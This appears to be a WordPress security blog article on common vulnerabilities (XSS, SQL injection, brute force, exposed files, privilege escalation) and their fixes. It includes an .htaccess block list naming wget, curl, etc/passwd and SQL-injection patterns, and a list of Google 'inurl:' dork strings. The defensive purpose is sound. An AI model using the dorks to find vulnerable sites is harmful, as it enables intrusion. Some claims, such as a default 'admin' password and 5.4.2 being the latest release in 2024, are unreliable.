Table of Contents [TOC]
WordPress is one of the most widely used Open source CMS tool that powers millions of websites. This popularity of WordPress has made it an important target for web attackers. The WordPress team is sharing security guides timely to protect the websites from WordPress security issues and even the protection is tightened down by many websites. But still, there are some websites that are vulnerable due to several reasons which makes it easy for hackers to hack a wordpress site.
In this article, we provide you list of various wordpress core issues, vulnerabilities in 2024 how to identify & fix a security vulnerability in wordpress using various tools.
Also Read – List Of Best WordPress Security Scanners 2024
Check out the latest Vulnerable WordPress Plugins And WordPress security News
Make sure to update latest WordPress version 5.4. 2, a security and maintenance release that came out on June 10th, 2020. Other recent versions include: WordPress 5.4.
From time to time, WordPress releases have been vulnerable and exploits were commonly found in these versions. In case you want to have a deeper look into the exploits you can have it below.
This kind of WordPress Security vulnerability allows an unauthorized user to change the content of any blog, post or page within a WordPress Website. When a web application is not securely handled, it becomes an easy target for WordPress hackers to supply content via a parameter value which will modify the contents of the page. As the page is linked with a trusted domain, the user believes that the certain content appearing on the Web site is legitimate and not from an external source. Also Read – WordPress REST API Vulnerability Content Injection Exploit [FIXED]
The malicious links are crafted specially with the motive to spoof a login form and steal sensitive information, for example, the login credentials. These links are sent to user via an email. If the user visits the page, designated with the malicious URL and logins the account believing that he is viewing an authentic content, this provides an opportunity to the attacker to exploit website’s content and break user trust. A strong work around this is to add WordPress 2-Factor Authentication
The only way to secure your website against serious content injection WordPress Security Vulnerability is to update your Websites with the latest versions as soon as wordpress security updates are released. – See latest WordPress Releases
In order to enable automatic updates in WordPress versions 3.7 or later, you will need to look for the code used to disable the option in the wp-config.php.
XSS Vulnerability is one of the most common attacks in which malicious code is injected directly into a vulnerable web application. In Stored Cross-Site Scripting, the vulnerability occurs within the WordPress editor, responsible for the creating and editing all of the WordPress posts, pages, and topics (in bbPress).
The perpetrator injects malicious script on your website which steals visitors session cookies for every site visitor and thus can steal sensitive information. By acting on the behalf of an administrator user, he can send authenticated requests to edit the website’s current PHP code, leading to Remote Command Execution (RCE) and complete takeover.
Types of store XSS Vulnerability
Update your WordPress installation as soon as possible. If you have automatic updates enabled on your WordPress site, you should already be using the latest version and are now protected from this vulnerability.
This is a serious vulnerability that can be misused in different ways to compromise a vulnerable site. If you believe your WordPress site is hacked, you can use WordPress security services.
Prevent XSS Vulnerability Plugin
This plugin encode the following signs and then Remove some XSS signs from the URL.
These methods—validation, sanitation, and escaping—prevent all types of WordPress XSS attacks.
For Further Reading;
Sql is a standard command language used in MySQL database. WordPress SQL injection is a type of attack triggered by embedding commands in a URL that reveals sensitive information about database thus permitting a hacker to enter the website and potentially change the original content of your website.
Whereas, URL hacking is another attempt to trigger unintended PHP commands that leads to injecting malware to your website or revealing sensitive information.
WordPress Codex on protecting queries against SQL Injection attacks can be found here:
Most WordPress installations are hosted on the popular Apache web server. which uses a file named .htaccess to define the access rules for your web site.
A thorough set of rules can prevent many types of SQL Injection and URL hacks from being decoded and thus secures your website from many dangerous .htaccess attack injections.
<IfModule mod_rewrite.c>
# Enable rewrite engine
RewriteEngine On
# Block suspicious request methods
RewriteCond %{REQUEST_METHOD} ^(HEAD|TRACE|DELETE|TRACK|DEBUG) [NC]
RewriteRule ^(.*)$ - [F,L]
# Block WP timthumb hack
RewriteCond %{REQUEST_URI} (timthumb\.php|phpthumb\.php|thumb\.php|thumbs\.php) [NC]
RewriteRule . - [S=1]
# Block suspicious user agents and requests
RewriteCond %{HTTP_USER_AGENT} (libwww-perl|wget|python|nikto|curl|scan|java|winhttp|clshttp|loader) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} (<|>|'|%0A|%0D|%27|%3C|%3E|%00) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} (;|<|>|'|"|\)|\(|%0A|%0D|%22|%27|%28|%3C|%3E|%00).*(libwww-perl|wget|python|nikto|curl|scan|java|winhttp|HTTrack|clshttp|archiver|loader|email|harvest|extract|grab|miner) [NC,OR]
RewriteCond %{THE_REQUEST} \?\ HTTP/ [NC,OR]
RewriteCond %{THE_REQUEST} \/\*\ HTTP/ [NC,OR]
RewriteCond %{THE_REQUEST} etc/passwd [NC,OR]
RewriteCond %{THE_REQUEST} cgi-bin [NC,OR]
RewriteCond %{THE_REQUEST} (%0A|%0D) [NC,OR]
# Block MySQL injections, RFI, base64, etc.
RewriteCond %{QUERY_STRING} [a-zA-Z0-9_]=http:// [OR]
RewriteCond %{QUERY_STRING} [a-zA-Z0-9_]=http%3A%2F%2F [OR]
RewriteCond %{QUERY_STRING} [a-zA-Z0-9_]=(\.\.//?)+ [OR]
RewriteCond %{QUERY_STRING} [a-zA-Z0-9_]=/([a-z0-9_.]//?)+ [NC,OR]
RewriteCond %{QUERY_STRING} \=PHP[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12} [NC,OR]
RewriteCond %{QUERY_STRING} (\.\./|\.\.) [OR]
RewriteCond %{QUERY_STRING} ftp\: [NC,OR]
RewriteCond %{QUERY_STRING} http\: [NC,OR]
RewriteCond %{QUERY_STRING} https\: [NC,OR]
RewriteCond %{QUERY_STRING} \=\|w\| [NC,OR]
RewriteCond %{QUERY_STRING} ^(.*)/self/(.*)$ [NC,OR]
RewriteCond %{QUERY_STRING} ^(.*)cPath=http://(.*)$ [NC,OR]
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
RewriteCond %{QUERY_STRING} (<|%3C)([^s]*s)+cript.*(>|%3E) [NC,OR]
RewriteCond %{QUERY_STRING} (\<|%3C).*iframe.*(\>|%3E) [NC,OR]
RewriteCond %{QUERY_STRING} (<|%3C)([^i]*i)+frame.*(>|%3E) [NC,OR]
RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [NC,OR]
RewriteCond %{QUERY_STRING} base64_(en|de)code[^(]*\([^)]*\) [NC,OR]
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2}) [OR]
RewriteCond %{QUERY_STRING} ^.*(\[|\]|\(|\)|<|>).* [NC,OR]
RewriteCond %{QUERY_STRING} (NULL|OUTFILE|LOAD_FILE) [OR]
RewriteCond %{QUERY_STRING} (\./|\../|\.../)+(motd|etc|bin) [NC,OR]
RewriteCond %{QUERY_STRING} (localhost|loopback|127\.0\.0\.1) [NC,OR]
RewriteCond %{QUERY_STRING} (<|>|'|%0A|%0D|%27|%3C|%3E|%00) [NC,OR]
RewriteCond %{QUERY_STRING} concat[^\(]*\( [NC,OR]
RewriteCond %{QUERY_STRING} union([^s]*s)+elect [NC,OR]
RewriteCond %{QUERY_STRING} union([^a]*a)+ll([^s]*s)+elect [NC,OR]
RewriteCond %{QUERY_STRING} (;|<|>|'|"|\)|%0A|%0D|%22|%27|%3C|%3E|%00).*(/\*|union|select|insert|drop|delete|update|cast|create|char|convert|alter|declare|order|script|set|md5|benchmark|encode) [NC,OR]
# PHP-CGI Vulnerability
RewriteCond %{QUERY_STRING} ^(%2d|\-)[^=]+$ [NC,OR]
#proc/self/environ? no way!
RewriteCond %{QUERY_STRING} proc\/self\/environ [NC,OR]
RewriteCond %{QUERY_STRING} (sp_executesql) [NC]
RewriteRule ^(.*)$ - [F,L]
</IfModule>
As the name suggests, this type of vulnerability is encountered when hackers try to login your administrator panel using login guess. Hackers often rely on automated scripts to make numerous attempts to log into your WordPress administration page by trying thousands and millions of combinations of usernames and passwords. The brute-force attempts not only slow down your website but also if hackers succeed in their mission may provide hackers complete control of your website and thus harmful for your website.
Two important ways to fix Brute-Force Login Attempts:
A WordPress table consists every bit of information about your website. Thus, it acts as the most favourite target for hackers. Your WordPress website must have a number of tables. In general, these database tables are named with a prefix “wp-” which makes it easy to predict for hackers and plan a attack to get your WordPress hacked.
The smartest way to protect your WordPress website from this type of vulnerabilities is to change the prefix of WordPress tables.
This way you can choose something unpredictable and unique making it harder for hackers to predict.
To know, how to change default prefix for your WordPress tables, you can watch this video. To avoid any kind of loss to your data, we strongly recommend you to keep backups daily.
Other way to secure your WordPress database tables from vulnerabilities is to use ithemes security plugin which provides security against plugin vulnerabilities, weak password attacks, and obsolete software.
When a user downloads WordPress, there is a default admin account whose password is simply set as ‘admin’ which is so easy to guess by professional hackers. Thus, a hacker can try to access your account using password.
Never give an edge of predictability of passwords to a hacker. Secondly, why to use an default admin account. You must change your default wordpress username.
Create a new user account and keep a unique name very hard to guess. Authorize the permissions of admin to this user account.
This way, the hacker would have to predict both the username as well as password to access administrator account.
As a WordPress Security Scanner, we observed that out of thousands websites we scan every day, each of those websites have at least one sensitive file visible to anyone on the internet.
An important source of vulnerability lies on the files which have nothing to do with your website and are created just as backups copies.
Sometimes Performing in-place editing or other administrative actions on production web servers may inadvertently leave backup copies, either generated automatically by the editor while editing files, or by the administrator who is zipping a set of files to create a backup.
These files post a serious security threat to the application as are the easiest target for hackers. This may include configuration files, un referenced files, pages, backup files, sensitive log files etc.
For a typical WordPress installation, block the access to directory listings, using
Add commands to the Apache .htaccess file to block access to sensitive private files related to WordPress and the Web server itself.
To restrict access to just your wp-admin, add the follow code snippet:
<IfModule mod_rewrite.c>
RewriteEngine on
RewriteCond %{REQUEST_URI} ^(.*)?wp-login\.php(.*)$ [OR]
RewriteCond %{REQUEST_URI} ^(.*)?wp-admin$
RewriteCond %{REMOTE_ADDR} !^42\.114\.178\.163$
RewriteRule ^(.*)$ - [R=403,L]
</IfModule>
This is a great method to secure your site because it ensures the only people with access to your wp-admin are users with authorised IPs.
If you want to restrict access to your WordPress configuration file, wp-config.php, you need to add the following files to your htaccess file.
<files wp-config.php>
order allow,deny
deny from all
</files>
As the name itself says, the Privilege Escalation Attack is a web attack that involves network intrusion resulting from configuration failure to your operating system or system software, programming errors or designing flaws and grants the hacker an elevated access to application network, data and other information than intended by application developer and it privileges the hacker to perform unauthorised actions. A hacker can get complete control on targeted system through this WordPress security vulnerability.
A privilege escalation comes under two categories:
Vertical Privilege Escalation
This type of privilege escalation attack involves performing those kernel-level operations which permit the attacker to run unauthorised code. It is also known as privilege elevation for the reason that a low privilege user is granted an access to functions performed by a high privilege user.
Horizontal Privilege Escalation
Under Horizontal Privilege Escalation, the attacker would require the access to another user’s account to enter into application’s network.
The first step to prevent your WordPress website from this serious vulnerability is to check the different roles and permissions supported by the application and set Correct file permissions for WordPress.
To check the user roles and authorities granted to WordPress users.(source:wp-snippets)
Code Snippet:
<?php
if( current_user_can('editor') ) {
// true if user is an editor
}
if( !current_user_can('administrator') ) {
// true if user is not admin
}
if( current_user_can('edit_posts') ) {
// true if user can edit posts
}
?>
You need to keep a check over this time to time.
List every role registered in WordPress.
Code Snippet:
$roles = new WP_Roles();
$roles_names = $roles->get_names();
foreach ($roles_names as $role) {
print_r($role);
}
To get a user’s role using the user’s id (source:stackexchange)
function get_user_roles_by_user_id( $user_id ) {
$user = get_userdata( $user_id );
return empty( $user ) ? array() : $user->roles;
}
Then, an is_user_in_role()
function could be implemented like so:
function is_user_in_role( $user_id, $role ) {
return in_array( $role, get_user_roles_by_user_id( $user_id ) );
}
The vulnerability was fixed in WordPress 4.9.7 version, ( Also See Latest WordPress Versions) released on July 5. In order to successfully exploit this issue, the attacker would need to gain access to edit and delete media files which can be achieved by taking over an Author account or by targeting sites that expose the media functionality through various plugins. Website which did not updated their WordPress versions and were still running on outdated versions with specific media plugins installed, were mostly affected by this exploit.
Before moving ahead, lets know about how to find a security vulnerability in wordpress site. There are various website vulnerability scanner tools which we can use to scan your site for security vulnerabilities and malware. Mostly these Vulnerability Scanners ensures web application security by securing your website and web applications against hacker attacks. These automated tools scan web applications, normally from the outside, to look for security vulnerabilities such as Cross-site scripting, SQL Injection.
Shhhhh……!!!!! This is something you wont find on any other WordPress security blog. This is a bit of reverse engineering stuff here. You can use such strings and append your website to find any possible loophole which might be present in your website, in case your site turns up in the results, than you might need to worry a little.
inurl:php?=id1 inurl:index.php?id= inurl:trainers.php?id= inurl:buy.php?category= inurl:article.php?ID= inurl:play_old.php?id= inurl:declaration_more.php?decl_id= inurl:pageid= inurl:games.php?id= inurl:page.php?file= inurl:newsDetail.php?id= inurl:gallery.php?id= inurl:article.php?id= inurl:show.php?id= inurl:staff_id= inurl:newsitem.php?num= andinurl:index.php?id= inurl:trainers.php?id= inurl:buy.php?category= inurl:article.php?ID= inurl:play_old.php?id= inurl:declaration_more.php?decl_id= inurl:pageid= inurl:games.php?id= inurl:page.php?file= inurl:newsDetail.php?id= inurl:gallery.php?id= inurl:article.php?id= inurl:show.php?id= inurl:staff_id= inurl:newsitem.php?num=
WPHH is a WordPress malware Scanner which scans your entire website and identify security issues in detail. This web vulnerability scanner is easy to use, fast, and accurate
Some of the most commonly used tools are:
We hope you find this article very useful. We are available to help you with different wordpress security issues via our WordPress security guide. If you want a website scan or removal of other malware infections, contact us to better analyze the security of your website and fix your wordpress site.